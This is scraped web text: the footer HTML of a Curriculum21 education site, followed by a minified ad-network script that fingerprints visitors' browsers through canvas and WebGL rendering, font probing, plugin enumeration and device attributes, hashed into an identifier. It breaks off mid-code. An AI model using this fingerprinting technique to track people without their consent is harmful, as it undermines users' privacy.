src="http://www.curriculum21.com/wp-content/themes/curriculum21/images/youtube.png" border="0" alt="YouTube" style="vertical-align:middle"></a> </td> <td align="center" valign="middle" width="16%"> <a href="http://itunes.apple.com/us/podcast/curriculum-21-podcast/id419480932" target="_blank" style="vertical-align:middle"><img src="http://www.curriculum21.com/wp-content/themes/curriculum21/images/itunes.png" border="0" alt="C21 iTunes Podcast Channel" style="vertical-align:middle"></a> </td> <td align="center" valign="middle" width="16%"> <!-- AddThis Button BEGIN --> <a href="http://www.addthis.com/bookmark.php?v=250" onmouseover="return addthis_open(this, '', '[URL]', '[TITLE]')" onmouseout="addthis_close()" onclick="return addthis_sendto()" style="vertical-align:middle"><img src="http://s7.addthis.com/static/btn/lg-share-en.gif" alt="Bookmark and Share" border="0" style="vertical-align:middle"></a> <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?pub=xa-4a1f2f8118a700d1"></script> <!-- AddThis Button END --> </td> </tr> </tbody> </table> &copy; 2009 - 2019. Curriculum21™, CMI National CM Institute™, CMI Regioinal Conferences™ and Mapping to the Core™ are services of Curriculum Designers, Inc., Rye, NY. All Rights Reserved. </div> </div> <script type="text/javascript"> Cufon.now(); </script> <script type='text/javascript'>/* <![CDATA[ */ var portfolioSlideshowOptions = { psFancyBox:true, psHash:false, psThumbSize:'75', psFluid:false, psTouchSwipe:false, psKeyboardNav:false, psBackgroundImages:false, psInfoTxt:'of' };/* ]]> */</script><script type='text/javascript' src='http://www.curriculum21.com/wp-content/plugins/portfolio-slideshow-pro/js/scrollable.min.js?ver=1.2.5'></script> <script type='text/javascript' src='http://www.curriculum21.com/wp-content/plugins/portfolio-slideshow-pro/js/portfolio-slideshow.min.js?ver=1.8.7'></script> <script type='text/javascript' src='http://www.curriculum21.com/wp-content/plugins/portfolio-slideshow-pro/js/fancybox/jquery.fancybox-1.3.4.pack.js?ver=1.3.4a'></script> <script type='text/javascript' src='http://www.curriculum21.com/wp-content/plugins/portfolio-slideshow-pro/js/code.photoswipe.jquery-3.0.4.min.js?ver=3.0.4'></script> <script type='text/javascript' src='http://www.curriculum21.com/wp-content/plugins/portfolio-slideshow-pro/js/jquery.cycle.all.min.js?ver=2.99'></script> <script type='text/javascript' src='http://www.curriculum21.com/wp-includes/js/comment-reply.min.js?ver=06a6e77dacbc32d41e520f792996873e'></script> <script type='text/javascript' src='http://www.curriculum21.com/wp-content/plugins/custom-facebook-feed-pro/js/cff-scripts.js?13&#038;ver=1.8'></script> <script type='text/javascript' src='http://www.curriculum21.com/wp-includes/js/wp-embed.min.js?ver=06a6e77dacbc32d41e520f792996873e'></script> </body> </html>
1
!function(){var i={adBlockId:"5b7dd9054cfdb10010e8a615",publId:"5b6b593a0721410010b0c645",blockClass:"bmadblock-5b7dd9054cfdb10010e8a615",iframeClass:"bmadresult-5b7dd9054cfdb10010e8a615",sourceURL:document.location.href.slice(0,document.location.href.length-document.location.hash.length),sourceRef:document.referrer,userAgent:navigator.userAgent,displayHost:"//ad.bitmedia.io/",displayHostSrc:"//ad.bitmedia.io/",adSuccess:!1,loadTime:3,badCode:"",badType:"transparent",badColor:"",badAdClient:"",badAdSlot:"",badAdHeight:"0",badAdWidth:"0",SourceId:"",SessionId:"",TrackImpression:"0",TrackYandex:"0",YaCounterID:""},t=function(e){this.options=this.extend(e,{}),this.nativeForEach=Array.prototype.forEach,this.nativeMap=Array.prototype.map,this.entropy=0,this.keyStr="",this.keyNoUAStr=""};t.prototype={extend:function(e,t){if(null===e)return t;for(var o in e)null!==e[o]&&t[o]!==e[o]&&(t[o]=e[o]);return t},getEntropy:function(){return this.entropy},get:function(){return this.x64hash128(this.keyStr,31)},getNoUA:function(){return this.x64hash128(this.keyNoUAStr,31)},init:function(){var e=[];e=this.activeXKeys(e),e=this.languageKey(e),e=this.touchEnabledKey(e),e=this.javaKey(e),e=this.colorDepthKey(e),e=this.screenResolutionKey(e),e=this.timezoneOffsetKey(e),e=this.sessionStorageKey(e),e=this.localStorageKey(e),e=this.indexedDbKey(e),e=this.addBehaviorKey(e),e=this.openDatabaseKey(e),e=this.cpuClassKey(e),e=this.webRTCKey(e),e=this.platformKey(e),e=this.doNotTrackKey(e),e=this.canvasKey(e),e=this.getWebgl(e),e=this.jsFontsKey(e),this.keyNoUAStr=e.join("~~~"),e=this.userAgentKey(e),this.keyStr=e.join("~~~")},userAgentKey:function(e){return this.options.excludeUserAgent||(e.push(navigator.userAgent),this.entropy+=10),e},touchEnabledKey:function(e){var t;t=!1;try{document.createEvent("TouchEvent")&&(t=!0)}catch(e){}return e.push("TouchEnabled: "+t),this.entropy+=1,e},languageKey:function(e){return this.options.excludeLanguage||(e.push(navigator.language),this.entropy+=5),e},javaKey:function(e){var t="NA";t=null;try{t=navigator.javaEnabled()?"true":"false",this.entropy+=1,strOut=t}catch(e){}return e.push("Java enabled: "+t),e},colorDepthKey:function(e){return this.options.excludeColorDepth||(e.push(screen.colorDepth),this.entropy+=1),e},screenResolutionKey:function(e){if(!this.options.excludeScreenResolution){var t=this.getScreenResolution();void 0!==t&&(e.push(t.join("x")),this.entropy+=5)}return e},getScreenResolution:function(){return this.options.detectScreenOrientation?screen.height>screen.width?[screen.height,screen.width]:[screen.width,screen.height]:[screen.height,screen.width]},timezoneOffsetKey:function(e){return this.options.excludeTimezoneOffset||(e.push((new Date).getTimezoneOffset()),this.entropy+=3),e},sessionStorageKey:function(e){return!this.options.excludeSessionStorage&&this.hasSessionStorage()&&(e.push("sessionStorageKey"),this.entropy+=1),e},localStorageKey:function(e){return!this.options.excludeSessionStorage&&this.hasLocalStorage()&&(e.push(localStorage),this.entropy+=1),e},indexedDbKey:function(e){return!this.options.excludeIndexedDB&&this.hasIndexedDB()&&(e.push("indexedDbKey"),this.entropy+=1),e},addBehaviorKey:function(e){return document.body&&!this.options.excludeAddBehavior&&document.body.addBehavior&&e.push("addBehaviorKey"),e},openDatabaseKey:function(e){return!this.options.excludeOpenDatabase&&window.openDatabase&&(e.push("openDatabase"),this.entropy+=1),e},cpuClassKey:function(e){return this.options.excludeCpuClass||e.push(this.getNavigatorCpuClass()),e},platformKey:function(e){return this.options.excludePlatform||e.push(this.getNavigatorPlatform()),e},doNotTrackKey:function(e){return this.options.excludeDoNotTrack||e.push(this.getDoNotTrack()),e},webRTCKey:function(e){return this.isWebRTCSupported()?e.push("WebRTC: supported"):e.push("WebRTC: not supported"),this.entropy+=1,e},isWebRTCSupported:function(){return!!window.webkitRTCPeerConnection||!!window.mozRTCPeerConnection},canvasKey:function(e){return!this.options.excludeCanvas&&this.isCanvasSupported()&&(e.push(this.getCanvasFp()),this.entropy+=5),e},jsFontsKey:function(e){var t,o,n,i,a,r,s,d,l,c,u,h;c=l=h=r=i=d=o=t=null,s=n=0;try{for(t="position: absolute; visibility: hidden; display: block !important",n=(o=["Book Antiqua","Bookman Old Style","Bradley Hand ITC","Bodoni MT","Consolas","Copperplate Gothic Bold","English Text MT","Felix Titling","Garamond","Georgia","Gentium","Haettenschweiler","Impact","Jokerman","King","Kootenay","Latha","Lalit","Lucida Grande","Magneto","Mistral","Modena","Monotype Corsiva","MV Boli","OCR A Extended","Onyx","Palatino Linotype","Parchment","Pericles","Playbill","Segoe Print","Shruti","TeX","Times","Trebuchet MS","Verdana","Verona","Arial CYR","Chiller","Berlin Sans FB","Blackadder ITC","Symbol","Webdings","Agency FB","Vijaya","Algerian","Bodoni MT Poster Compressed","Kartika","MS Mincho","MS Outlook","Segoe UI","Aharoni","Aparajita","Amienne","LuzSans-Book","ZWAdobeF","SimSun-PUA","Blackletter686 BT","Matisse ITC","Bell Gothic Std Black","David Transparent","Adobe Caslon Pro","AR BERKLEY","Australian Sunrise","Gentium Basic","Highlight LET","Adobe Myungjo Std M","GothicE","HP PSG","DejaVu Sans","Arno Pro","Futura Bk","DejaVu Sans Condensed","Euro Sign","Neurochrome","Bell Gothic Std Light","Jokerman Alts LET","Adobe Fan Heiti Std B","Baby Kruffy","Tubular","Woodcut","HGHeiseiKakugothictaiW3","YD2002","Tahoma Small Cap","Bickley Script","Unicorn","X-Files","GENISO","Frutiger SAIN Bd v.1","ZDingbats","ABSALOM","Vagabond","Year supply of fairy cakes","Myriad Condensed Web","Segoe Media Center","Coronet","Segoe Condensed","Weltron Urban","AcadEref","DecoType Naskh","Freehand521 BT","Enviro","SWGamekeys MT","Croobie","Arial Narrow Special G1","AVGmdBU","Candles","Futura Bk BT","Andy","QuickType","WP Arabic Sihafa","DigifaceWide","ELEGANCE","BRAZIL","Pepita MT","Nina","OCR B MT","Blade Runner Movie Font","Allegro BT","Lucida Blackletter","AGA Arabesque","AdLib BT","Clarendon","Monotype Sorts","Alibi","Bremen Bd BT","mono","News Gothic MT","AvantGarde Bk BT","chs_boot","Palatino","BernhardFashion BT","CloisterBlack BT","BernhardMod BT","Nokia Smiley","Boulder","Andale Mono IPA","Belwe Lt BT","Calligrapher","Belwe Cn BT","Tanseek Pro Arabic","FuturaBlack BT","Abadi MT Condensed","Mangal","Chaucer","Belwe Bd BT","DomCasual BT","Bitstream Vera Sans","URW Gothic L","GeoSlab703 Lt BT","Bitstream Vera Sans Mono","Nimbus Mono L","Heather","Antique Olive","Clarendon Cn BT","Amazone BT","Bitstream Vera Serif","Utopia","Americana BT","Map Symbols","Bitstream Charter","Aurora Cn BT","CG Omega","Lohit Punjabi","Balloon XBd BT","Akhbar MT","Courier 10 Pitch","Benguiat Bk BT","Market","Cursor","Bodoni Bk BT","Letter Gothic","Luxi Sans","Brush455 BT","Sydnie","Lohit Hindi","Lithograph","Albertus","DejaVu LGC Serif","Lydian BT","Antique Olive Compact","KacstArt","Incised901 Bd BT","Clarendon Extended","Lohit Telugu","Incised901 Lt BT","GiovanniITCTT","KacstOneFixed","Folio XBd BT","Edda","Loma","Formal436 BT","Fine Hand","Garuda","Impress BT","RefSpecialty","Sazanami Mincho","Staccato555 BT","VL Gothic","Hkmer OS","WP BoxDrawing","Clarendon Blk BT","Droid Sans","CommonBullets","Sherwood","CopprplGoth Bd BT","Smudger Alts LET","BPG Rioni","CopprplGoth BT","Estrangelo TurAbdin","Dauphin","Arial Tur","English111 Vivace BT","Steamer","OzHandicraft BT","Arial Cyr","Futura Lt BT","Liberation Sans Narrow","Futura XBlk BT","Candy Round BTN Cond","GoudyHandtooled BT","GrilledCheese BTN Cn","GoudyOlSt BT","Galeforce BTN","Kabel Bk BT","Sneakerhead BTN Shadow","OCR-A BT","Denmark","OCR-B 10 BT","Swiss921 BT","PosterBodoni BT","Arial (Arabic)","Serifa BT","FlemishScript BT","American Typewriter","Apple Symbols","AppleMyungjo","Zapfino","BlairMdITC TT-Medium","Cracked","KufiStandardGK","Plantagenet Cherokee","Apple Casual","Type Embellishments One LET","Abadi MT Condensed Extra Bold","Calibri Bold","Calisto MT","Chalkduster","Franklin Gothic Book Italic","Geneva CY","Franklin Gothic Book","Helvetica Light","Gill Sans MT","Bank Gothic","Bodoni SvtyTwo SC ITC TT-Book","Tekton Pro","Courier CE","Maestro","BO Futura BoldOblique","Lucida Bright Demibold","New","AGaramond","Charcoal","DIN-Black","Lucida Sans Demibold","Stone Sans OS ITC TT-Bold","AGaramond Italic","Bickham Script Pro Regular","Adobe Arabic Bold","AGaramond Semibold","Al Bayan Bold","Doremi","AGaramond SemiboldItalic","Arno Pro Bold","B Futura Bold","Frutiger 47LightCn","Gadget","HelveticaNeueLT Std Bold","Frutiger 57Cn","DejaVu Serif Italic Condensed","Myriad Pro Black It","Frutiger 67BoldCn","Gentium Basic Bold","Sand","GillSans","H Futura Heavy","Liberation Mono Bold","GillSans Bold","Courier Final Draft","HelveticaNeue BlackCond","Techno","HelveticaNeue BlackCondObl","Gabriola","JazzText Extended","HelveticaNeue BlackExt","Textile","HelveticaNeue BlackExtObl fantasy","HelveticaNeue BoldCond","Palatino Linotype Bold","HelveticaNeue BoldCondObl","BIRTH OF A HERO","HelveticaNeue BoldExt","Bleeding Cowboys","HelveticaNeue BoldExtObl","ChopinScript","HelveticaNeue ExtBlackCond","HelveticaNeue ExtBlackCondObl","HelveticaNeue HeavyCond","HelveticaNeue HeavyCondObl","OpenSymbol","HelveticaNeue HeavyExt","HelveticaNeue HeavyExtObl","HelveticaNeue LightCondObl","Nueva Std","HelveticaNeue ThinCond","Chicago","HelveticaNeue ThinCondObl","Nueva Std Bold","Brush Script MT","Capitals","Avant Garde","B Avant Garde Demi","Nueva Std Bold Italic","BI Avant Garde DemiOblique","MaestroTimes","Univers BoldExtObl","APC Courier","Myriad Web Pro Bold","Myriad Pro Light","Carta","DIN-Bold","DIN-Light","Myriad Web Pro Condensed Italic","DIN-Medium","Tekton Pro Oblique","DIN-Regular","AScore","HelveticaNeue UltraLigCondObl","HelveticaNeue UltraLigExt","Myriad Pro Light It","HelveticaNeue UltraLigExtObl","HO Futura HeavyOblique","Opus Japanese Chords","L Frutiger Light","VT100","L Futura Light","LO Futura LightOblique","Myriad Pro Black","New York","O Futura BookOblique","R Frutiger Roman","Reprise","TradeGothic","Warnock Pro Bold Caption","Univers 45 Light","Warnock Pro","XBO Futura ExtraBoldOblique","Univers 45 LightOblique","Liberation Mono","Univers 55 Oblique","UC LCD","Univers 57 Condensed","Warnock Pro Bold","Univers ExtraBlack","Warnock Pro Light Ital Subhead","Univers LightUltraCondensed","Matrix Ticker","Univers UltraCondensed","Fang Song"]).length,i="<b style=\"display:inline !important; width:auto !important; font:normal 40px/1 'X',sans-serif !important\">ww</b><br/><b style=\"display:inline !important; width:auto !important; font:normal 40px/1 'X',monospace !important\">ww</b>",a=document.createDocumentFragment(),r=[],s=0;s<n;s+=1)d=o[s],l=document.createElement("div"),d=d.replace(/['"<>]/g,""),l.innerHTML=i.replace(/X/g,d),l.style.cssText=t,a.appendChild(l),r.push(l);for((c=document.body).insertBefore(a,c.firstChild),u=[],s=0;s<n;s+=1)(h=r[s].getElementsByTagName("b"))[0].offsetWidth===h[1].offsetWidth&&u.push(o[s]);for(s=0;s<n;s+=1)c.removeChild(r[s]);this.entropy+=8,e.push(u.join("|"))}catch(e){return"error"}return e},hasSessionStorage:function(){try{return!!window.sessionStorage}catch(e){return!0}},getWebglHash:function(e,t){var o=e.createBuffer();e.bindBuffer(e.ARRAY_BUFFER,o);var n=new Float32Array([-.2,-.9,0,.4,-.26,0,0,.732134444,0]);e.bufferData(e.ARRAY_BUFFER,n,e.STATIC_DRAW),o.itemSize=3,o.numItems=3;var i=e.createProgram(),a=e.createShader(e.VERTEX_SHADER);e.shaderSource(a,"attribute vec2 attrVertex; varying vec2 varyinTexCoordinate; uniform vec2 uniformOffset; void main() { varyinTexCoordinate = attrVertex + uniformOffset; gl_Position = vec4(attrVertex, 0, 1); }"),e.compileShader(a);var r=e.createShader(e.FRAGMENT_SHADER);return e.shaderSource(r,"precision mediump float; varying vec2 varyinTexCoordinate; void main() { gl_FragColor = vec4(varyinTexCoordinate, 0, 1); }"),e.compileShader(r),e.attachShader(i,a),e.attachShader(i,r),e.linkProgram(i),e.useProgram(i),i.vertexPosAttrib=e.getAttribLocation(i,"attrVertex"),i.offsetUniform=e.getUniformLocation(i,"uniformOffset"),e.enableVertexAttribArray(i.vertexPosArray),e.vertexAttribPointer(i.vertexPosAttrib,o.itemSize,e.FLOAT,!1,0,0),e.uniform2f(i.offsetUniform,1,1),e.drawArrays(e.TRIANGLE_STRIP,0,o.numItems),this.x64hash128(t.toDataURL(),31)},getWebgl:function(e){var t,o=document.createElement("canvas"),n=[];try{t=o.getContext("webgl")||o.getContext("experimental-webgl")}catch(e){}if(!t)return e;try{n=n.concat(t.getSupportedExtensions())}catch(e){}try{n.push(this.getWebglHash(t,o)),this.entropy+=5}catch(e){}return e.push(n.join("|")),e},activeXKeys:function(e){var d=this;function l(e){var t;t="";try{return null!==(t=document.body.getComponentVersion("{"+e+"}","ComponentID"))&&t}catch(e){return glbOnError}}function t(e){var t,o;for(t=!1,o=o=0;o<this.hashtable.length;o+=1)if(o===e&&null!==this.hashtable[o]){t=!0;break}return t}function o(e){return this.hashtable[e]}function n(){var e,t;for(t in e=[],t=0,this.hashtable)null!==this.hashtable[t]&&e.push(t);return e}function i(e,t){if(null===e||null===t)throw"NullPointerException {"+e+"},{"+t+"}";this.hashtable[e]=t}function a(){var e,t;for(t in t=e=0,this.hashtable)null!==this.hashtable[t]&&(e+=1);return e}function c(){this.containsKey=t,this.get=o,this.keys=n,this.put=i,this.size=a,this.hashtable=[]}var r=function(){var e,t,o,n,i,a,r,s;try{if((e=new c).put("7790769C-0471-11D2-AF11-00C04FA35D02","AddressBook"),e.put("47F67D00-9E55-11D1-BAEF-00C04FC2D130","AolArtFormat"),e.put("76C19B38-F0C8-11CF-87CC-0020AFEECF20","ArabicDS"),e.put("76C19B34-F0C8-11CF-87CC-0020AFEECF20","ChineseSDS"),e.put("76C19B33-F0C8-11CF-87CC-0020AFEECF20","ChineseTDS"),e.put("238F6F83-B8B4-11CF-8771-00A024541EE3","CitrixICA"),e.put("283807B5-2C60-11D0-A31D-00AA00B92C03","DirectAnim"),e.put("44BBA848-CC51-11CF-AAFA-00AA00B6015C","DirectShow"),e.put("9381D8F2-0288-11D0-9501-00AA00B911A5","DynHTML"),e.put("4F216970-C90C-11D1-B5C7-0000F8051515","DynHTML4Java"),e.put("D27CDB6E-AE6D-11CF-96B8-444553540000","Flash"),e.put("76C19B36-F0C8-11CF-87CC-0020AFEECF20","HebrewDS"),e.put("630B1DA0-B465-11D1-9948-00C04F98BBC9","IEBrwEnh"),e.put("08B0E5C0-4FCB-11CF-AAA5-00401C608555","IEClass4Java"),e.put("45EA75A0-A269-11D1-B5BF-0000F8051515","IEHelp"),e.put("DE5AED00-A4BF-11D1-9948-00C04F98BBC9","IEHelpEng"),e.put("89820200-ECBD-11CF-8B85-00AA005B4383","IE5WebBrw"),e.put("5A8D6EE0-3E18-11D0-821E-444553540000","InetConnectionWiz"),e.put("76C19B30-F0C8-11CF-87CC-0020AFEECF20","JapaneseDS"),e.put("76C19B31-F0C8-11CF-87CC-0020AFEECF20","KoreanDS"),e.put("76C19B50-F0C8-11CF-87CC-0020AFEECF20","LanguageAS"),e.put("08B0E5C0-4FCB-11CF-AAA5-00401C608500","MsftVM"),e.put("5945C046-LE7D-LLDL-BC44-00C04FD912BE","MSNMessengerSrv"),e.put("44BBA842-CC51-11CF-AAFA-00AA00B6015B","NetMeetingNT"),e.put("3AF36230-A269-11D1-B5BF-0000F8051515","OfflineBrwPack"),e.put("44BBA840-CC51-11CF-AAFA-00AA00B6015C","OutlookExpress"),e.put("76C19B32-F0C8-11CF-87CC-0020AFEECF20","PanEuropeanDS"),e.put("4063BE15-3B08-470D-A0D5-B37161CFFD69","QuickTime"),e.put("DE4AF3B0-F4D4-11D3-B41A-0050DA2E6C21","QuickTimeCheck"),e.put("3049C3E9-B461-4BC5-8870-4C09146192CA","RealPlayer"),e.put("2A202491-F00D-11CF-87CC-0020AFEECF20","ShockwaveDir"),e.put("3E01D8E0-A72B-4C9F-99BD-8A6E7B97A48D","Skype"),e.put("CC2A9BA0-3BDD-11D0-821E-444553540000","TaskScheduler"),e.put("76C19B35-F0C8-11CF-87CC-0020AFEECF20","ThaiDS"),e.put("3BF42070-B3B1-11D1-B5C5-0000F8051515","Uniscribe"),e.put("4F645220-306D-11D2-995D-00C04F98BBC9","VBScripting"),e.put("76C19B37-F0C8-11CF-87CC-0020AFEECF20","VietnameseDS"),e.put("10072CEC-8CC1-11D1-986E-00A0C955B42F","VML"),e.put("90E2BA2E-DD1B-4CDE-9134-7A8B86D33CA7","WebEx"),e.put("73FA19D0-2D75-11D2-995D-00C04F98BBC9","WebFolders"),e.put("89820200-ECBD-11CF-8B85-00AA005B4340","WinDesktopUpdateNT"),e.put("9030D464-4C02-4ABF-8ECC-5164760863C6","WinLive"),e.put("6BF52A52-394A-11D3-B153-00C04F79FAA6","WinMediaPlayer"),e.put("22D6F312-B0F6-11D0-94AB-0080C74C7E95","WinMediaPlayerTrad"),a=!(i=""),0<navigator.plugins.length)for(r=0;r<navigator.plugins.length;r+=1)!0===a?(i+=navigator.plugins[r].name,i+=navigator.plugins[r].description,a=!1):(i+=navigator.plugins[r].name,i+=navigator.plugins[r].description);else if(0<navigator.mimeTypes.length)for(s=navigator.mimeTypes,r=0;r<s.length;r+=1)!0===a?(i+=s[r].description,a=!1):i+=s[r].description;else{for(document.body.addBehavior("#default#clientCaps"),t=e.keys(),r=0;r<e.size();r+=1)n=l(t[r]),o=e.get(t[r]),n&&(!0===a?(i=o+n+"; ",a=!1):i+=o+n+"; ");i=i.replace(/,/g,".")}return""===(i=function(e){var t,o,n;t=0,n=o="";try{for(o=e.toLowerCase(),t=0;t<o.length;t+=1)"\n"!==o.charAt(t)&&"/"!==o.charAt(t)&&"\\"!==o.charAt(t)?n+=o.charAt(t):"\n"===o.charAt(t)&&(n+="n");return n}catch(e){return glbOnError}}(i))?i="None":d.entropy+=11,i}catch(e){return"NA"}}();return e.push("Plugins: "+r),e},hasLocalStorage:function(){try{return!!window.localStorage}catch(e){return!0}},hasIndexedDB:function(){return!!window.indexedDB},getNavigatorCpuClass:function(){return navigator.cpuClass?(this.entropy+=3,"navigatorCpuClass: "+navigator.cpuClass):"navigatorCpuClass: unknown"},getNavigatorPlatform:function(){return navigator.platform?(this.entropy+=2,"navigatorPlatform: "+navigator.platform):"navigatorPlatform: unknown"},getDoNotTrack:function(){return navigator.doNotTrack?(this.entropy+=1,"doNotTrack: "+navigator.doNotTrack):"doNotTrack: unknown"},getCanvasFp:function(){var e=document.createElement("canvas"),t=e.getContext("2d"),o="Cwm fjordbank glyphs vext quiz, https://github.com/valve á½ ";return t.textBaseline="top",t.font="70px 'Arial'",t.textBaseline="alphabetic",t.fillStyle="#f60",t.fillRect(125,1,62,20),t.fillStyle="#069",t.fillText(o,2,15),t.fillStyle="rgba(102, 204, 0, 0.7)",t.fillText(o,4,17),e.toDataURL()},isCanvasSupported:function(){var e=document.createElement("canvas");return!(!e.getContext||!e.getContext("2d"))},each:function(e,t,o){if(null!==e)if(this.nativeForEach&&e.forEach===this.nativeForEach)e.forEach(t,o);else if(e.length===+e.length){for(var n=0,i=e.length;n<i;n++)if(t.call(o,e[n],n,e)==={})return}else for(var a in e)if(e.hasOwnProperty(a)&&t.call(o,e[a],a,e)==={})return},map:function(e,n,i){var a=[];return null==e?a:this.nativeMap&&e.map===this.nativeMap?e.map(n,i):(this.each(e,function(e,t,o){a[a.length]=n.call(i,e,t,o)}),a)},x64Add:function(e,t){e=[e[0]>>>16,65535&e[0],e[1]>>>16,65535&e[1]],t=[t[0]>>>16,65535&t[0],t[1]>>>16,65535&t[1]];var o=[0,0,0,0];return o[3]+=e[3]+t[3],o[2]+=o[3]>>>16,o[3]&=65535,o[2]+=e[2]+t[2],o[1]+=o[2]>>>16,o[2]&=65535,o[1]+=e[1]+t[1],o[0]+=o[1]>>>16,o[1]&=65535,o[0]+=e[0]+t[0],o[0]&=65535,[o[0]<<16|o[1],o[2]<<16|o[3]]},x64Multiply:function(e,t){e=[e[0]>>>16,65535&e[0],e[1]>>>16,65535&e[1]],t=[t[0]>>>16,65535&t[0],t[1]>>>16,65535&t[1]];var o=[0,0,0,0];return o[3]+=e[3]*t[3],o[2]+=o[3]>>>16,o[3]&=65535,o[2]+=e[2]*t[3],o[1]+=o[2]>>>16,o[2]&=65535,o[2]+=e[3]*t[2],o[1]+=o[2]>>>16,o[2]&=65535,o[1]+=e[1]*t[3],o[0]+=o[1]>>>16,o[1]&=65535,o[1]+=e[2]*t[2],o[0]+=o[1]>>>16,o[1]&=65535,o[1]+=e[3]*t[1],o[0]+=o[1]>>>16,o[1]&=65535,o[0]+=e[0]*t[3]+e[1]*t[2]+e[2]*t[1]+e[3]*t[0],o[0]&=65535,[o[0]<<16|o[1],o[2]<<16|o[3]]},x64Rotl:function(e,t){return 32===(t%=64)?[e[1],e[0]]:t<32?[e[0]<<t|e[1]>>>32-t,e[1]<<t|e[0]>>>32-t]:(t-=32,[e[1]<<t|e[0]>>>32-t,e[0]<<t|e[1]>>>32-t])},x64LeftShift:function(e,t){return 0===(t%=64)?e:t<32?[e[0]<<t|e[1]>>>32-t,e[1]<<t]:[e[1]<<t-32,0]},x64Xor:function(e,t){return[e[0]^t[0],e[1]^t[1]]},x64Fmix:function(e){return e=this.x64Xor(e,[0,e[0]>>>1]),e=this.x64Multiply(e,[4283543511,3981806797]),e=this.x64Xor(e,[0,e[0]>>>1]),e=this.x64Multiply(e,[3301882366,444984403]),e=this.x64Xor(e,[0,e[0]>>>1])},x64hash128:function(e,t){t=t||0;for(var o=(e=e||"").length%16,n=e.length-o,i=[0,t],a=[0,t],r=[0,0],s=[0,0],d=[2277735313,289559509],l=[1291169091,658871167],c=0;c<n;c+=16)r=[255&e.charCodeAt(c+4)|(255&e.charCodeAt(c+5))<<8|(255&e.charCodeAt(c+6))<<16|(255&e.charCodeAt(c+7))<<24,255&e.charCodeAt(c)|(255&e.charCodeAt(c+1))<<8|(255&e.charCodeAt(c+2))<<16|(255&e.charCodeAt(c+3))<<24],s=[255&e.charCodeAt(c+12)|(255&e.charCodeAt(c+13))<<8|(255&e.charCodeAt(c+14))<<16|(255&e.charCodeAt(c+15))<<24,255&e.charCodeAt(c+8)|(255&e.charCodeAt(c+9))<<8|(255&e.charCodeAt(c+10))<<16|(255&e.charCodeAt(c+11))<<24],r=this.x64Multiply(r,d),r=this.x64Rotl(r,31),r=this.x64Multiply(r,l),i=this.x64Xor(i,r),i=this.x64Rotl(i,27),i=this.x64Add(i,a),i=this.x64Add(this.x64Multiply(i,[0,5]),[0,1390208809]),s=this.x64Multiply(s,l),s=this.x64Rotl(s,33),s=this.x64Multiply(s,d),a=this.x64Xor(a,s),a=this.x64Rotl(a,31),a=this.x64Add(a,i),a=this.x64Add(this.x64Multiply(a,[0,5]),[0,944331445]);switch(r=[0,0],s=[0,0],o){case 15:s=this.x64Xor(s,this.x64LeftShift([0,e.charCodeAt(c+14)],48));case 14:s=this.x64Xor(s,this.x64LeftShift([0,e.charCodeAt(c+13)],40));case 13:s=this.x64Xor(s,this.x64LeftShift([0,e.charCodeAt(c+12)],32));case 12:s=this.x64Xor(s,this.x64LeftShift([0,e.charCodeAt(c+11)],24));case 11:s=this.x64Xor(s,this.x64LeftShift([0,e.charCodeAt(c+10)],16));case 10:s=this.x64Xor(s,this.x64LeftShift([0,e.charCodeAt(c+9)],8));case 9:s=this.x64Xor(s,[0,e.charCodeAt(c+8)]),s=this.x64Multiply(s,l),s=this.x64Rotl(s,33),s=this.x64Multiply(s,d),a=this.x64Xor(a,s);case 8:r=this.x64Xor(r,this.x64LeftShift([0,e.charCodeAt(c+7)],56));case 7:r=this.x64Xor(r,this.x64LeftShift([0,e.charCodeAt(c+6)],48));case 6:r=this.x64Xor(r,this.x64LeftShift([0,e.charCodeAt(c+5)],40));case 5:r=this.x64Xor(r,this.x64LeftShift([0,e.charCodeAt(c+4)],32));case 4:r=this.x64Xor(r,this.x64LeftShift([0,e.charCodeAt(c+3)],24));case 3:r=this.x64Xor(r,this.x64LeftShift([0,e.charCodeAt(c+2)],16));case 2:r=this.x64Xor(r,this.x64LeftShift([0,e.charCodeAt(c+1)],8));case 1:r=this.x64Xor(r,[0,e.charCodeAt(c)]),r=this.x64Multiply(r,d),r=this.x64Rotl(r,31),r=this.x64Multiply(r,l),i=this.x64Xor(i,r)}return i=this.x64Xor(i,[0,e.length]),a=this.x64Xor(a,[0,e.length]),i=this.x64Add(i,a),a=this.x64Add(a,i),i=this.x64Fmix(i),a=this.x64Fmix(a),i=this.x64Add(i,a),a=this.x64Add(a,i),("00000000"+(i[0]>>>0).toString(16)).slice(-8)+("00000000"+(i[1]>>>0).toString(16)).slice(-8)+("00000000"+(a[0]>>>0).toString(16)).slice(-8)+("00000000"+(a[1]>>>0).toString(16)).slice(-8)}};var n,a,e,o,r=r||(n=function(e,t,o){return e.length>=t?e:n(o+e,t,o||" ")},a=function(e){var t=e.toString(16);return n(t,4,"0")},{new:function(){var o,e,t=void 0!==window.crypto,n=window.crypto&&void 0!==window.crypto.getRandomValues;return t&&n?(e=new window.Uint16Array(8),window.crypto.getRandomValues(e),[a(e[0])+a(e[1]),a(e[2]),a(e[3]),a(e[4]),a(e[5])+a(e[6])+a(e[7])].join("-")).split("-").join(""):(o=(new Date).getTime(),"xxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxx".replace(/[xy]/g,function(e){var t=(o+16*Math.random())%16|0;return o=Math.floor(o/16),("x"===e?t:7&t|8).toString(16)})).split("-").join("")}}),c={_keyStr:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",encode:function(e){var t,o,n,i,a,r,s,d="",l=0;for(e=c._utf8_encode(e);l<e.length;)i=(t=e.charCodeAt(l++))>>2,a=(3&t)<<4|(o=e.charCodeAt(l++))>>4,r=(15&o)<<2|(n=e.charCodeAt(l++))>>6,s=63&n,isNaN(o)?r=s=64:isNaN(n)&&(s=64),d=d+this._keyStr.charAt(i)+this._keyStr.charAt(a)+this._keyStr.charAt(r)+this._keyStr.charAt(s);return d},decode:function(e){var t,o,n,i,a,r,s="",d=0;for(e=e.replace(/[^A-Za-z0-9\+\/\=]/g,"");d<e.length;)t=this._keyStr.indexOf(e.charAt(d++))<<2|(i=this._keyStr.indexOf(e.charAt(d++)))>>4,o=(15&i)<<4|(a=this._keyStr.indexOf(e.charAt(d++)))>>2,n=(3&a)<<6|(r=this._keyStr.indexOf(e.charAt(d++))),s+=String.fromCharCode(t),64!=a&&(s+=String.fromCharCode(o)),64!=r&&(s+=String.fromCharCode(n));return 